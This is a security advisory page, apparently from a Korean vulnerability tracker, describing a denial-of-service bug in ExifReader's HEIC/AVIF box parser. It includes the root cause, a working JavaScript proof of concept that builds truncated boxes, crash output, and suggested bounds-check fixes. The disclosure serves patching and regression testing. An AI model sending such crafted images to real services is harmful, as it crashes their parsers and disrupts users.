ExifReader HEIC/AVIF ISO-BMFF parser throws uncaught RangeError on truncated boxes
위협 신호 · CVSS · EPSS · KEV
이론적 심각도 점수
예측 데이터 없음
실측 악용 기록 없음
2주 이내 패치 — 우선 조치 대상
CVSS 벡터 · 메트릭
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L상세 설명
Summary
ExifReader 4.40.0 can throw an uncaught RangeError: Offset is outside the bounds of the DataView while parsing crafted HEIC/AVIF files. The file only needs a valid leading ftyp box with a HEIC/AVIF major brand followed by a malformed ISO-BMFF box, such as an empty 8-byte free box or a truncated extended-size box.
This is reachable through the public ExifReader.load() API for in-memory buffers and through the async file/URL loaders when an application parses attacker-supplied images. In applications that do not wrap every parse in a defensive try/catch, a single uploaded or fetched image can abort the request/worker and cause a denial of service.
Credit requested: Yaohui Wang.
Affected version tested
- npm package:
exifreader - Version:
4.40.0 - Repository commit tested:
8cb0261a26b7d986955fe0a6780f076dcb7902e7
Root cause
The ISO-BMFF parser assumes that every top-level box with at least an 8-byte header also has enough bytes for the fields required by its parsed form. In src/image-header-iso-bmff.js:
findMetaBox()callsparseBox(dataView, offset)while only checking thatoffset + 8 <= dataView.byteLength.parseBox()callsgetBoxLength()and then unconditionally reads fields such as the full-box version byte formeta/iloc/iinf/idatboxes.getBoxLength()handlesboxLength === 1by callinghasEmptyHighBits(dataView, offset), which readsdataView.getUint32(offset + 8)without first checking that the 64-bit extended size field is present.
As a result, syntactically small or truncated boxes after a valid HEIC/AVIF ftyp box escape the format-detection catch blocks and throw from the main parsing path.
Reproduction
Run this from the repository root against the committed dist/exif-reader.js bundle:
1const ExifReader = require('./dist/exif-reader.js'); 2 3function u32be(n) { 4 return [(n >>> 24) & 255, (n >>> 16) & 255, (n >>> 8) & 255, n & 255]; 5} 6function ascii(s) { 7 return Array.from(Buffer.from(s, 'ascii')); 8} 9function box(type, content = []) {10 return [...u32be(8 + content.length), ...ascii(type), ...content];11}12 13for (const brand of ['heic', 'avif']) {14 for (const badBox of ['free', 'abcd']) {15 const bytes = Uint8Array.from([16 ...box('ftyp', ascii(brand)),17 ...box(badBox), // 8-byte box header with no content18 ]);19 20 try {21 ExifReader.load(bytes.buffer);22 console.log(`${brand}/${badBox}: no throw`);23 } catch (e) {24 console.log(`${brand}/${badBox}: ${e.name}: ${e.message}`);25 console.log(String(e.stack).split('\n').slice(0, 6).join('\n'));26 }27 }28}Observed output on Node v23.11.0 with ExifReader 4.40.0:
1heic/free: RangeError: Offset is outside the bounds of the DataView 2RangeError: Offset is outside the bounds of the DataView 3 at DataView.prototype.getUint8 (<anonymous>) 4 at parseBox (.../dist/exif-reader.js:1:16513) 5 at findMetaBox (.../dist/exif-reader.js:1:19032) 6 at findOffsets (.../dist/exif-reader.js:1:19101) 7 8heic/abcd: RangeError: Offset is outside the bounds of the DataView 9avif/free: RangeError: Offset is outside the bounds of the DataView10avif/abcd: RangeError: Offset is outside the bounds of the DataViewA second variant triggers the extended-size path:
1const truncatedExtendedBox = [...u32be(1), ...ascii('free')]; 2const heic = Uint8Array.from([...box('ftyp', ascii('heic')), ...truncatedExtendedBox]); 3ExifReader.load(heic.buffer);That throws from hasEmptyHighBits() / getBoxLength() because the extended-size high/low fields are not present.
Expected behavior
Malformed/truncated metadata boxes should be handled like other malformed metadata in the project: return only the successfully parsed file type/metadata, return no app markers, or throw a controlled project-specific error. A safe JavaScript bounds error should not escape from the parser for an attacker-controlled image container.
Security impact
This is a denial-of-service issue for services that parse user-provided HEIC/AVIF files with ExifReader. A minimal attacker-controlled image buffer can cause an unhandled exception in the parser and abort the surrounding request/worker if the embedding application does not catch every parse error.
Suggested severity: Medium. Suggested CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L.
Suggested fix
Add explicit bounds checks before every DataView read in the ISO-BMFF box parser, especially:
- before reading the 64-bit extended size fields in
getBoxLength(); - before reading the full-box version byte in
parseBox(); - before descending into
parseSubBoxes()when a declared box length exceeds available bytes; - ensure
findMetaBox()breaks on boxes whose declared length is invalid or not fully present.
A regression test should cover ftyp/heic and ftyp/avif followed by an 8-byte empty free/unknown box and by a truncated extended-size box.
AI 심층 분석
공격 시나리오 · 재현 가능한 PoC 페이로드 · 즉시 적용 가능한 차단 패치를 한 번에 받아 보세요. 보안 운영팀이 그대로 점검·티켓팅에 쓸 수 있는 형태로 정리해 드립니다.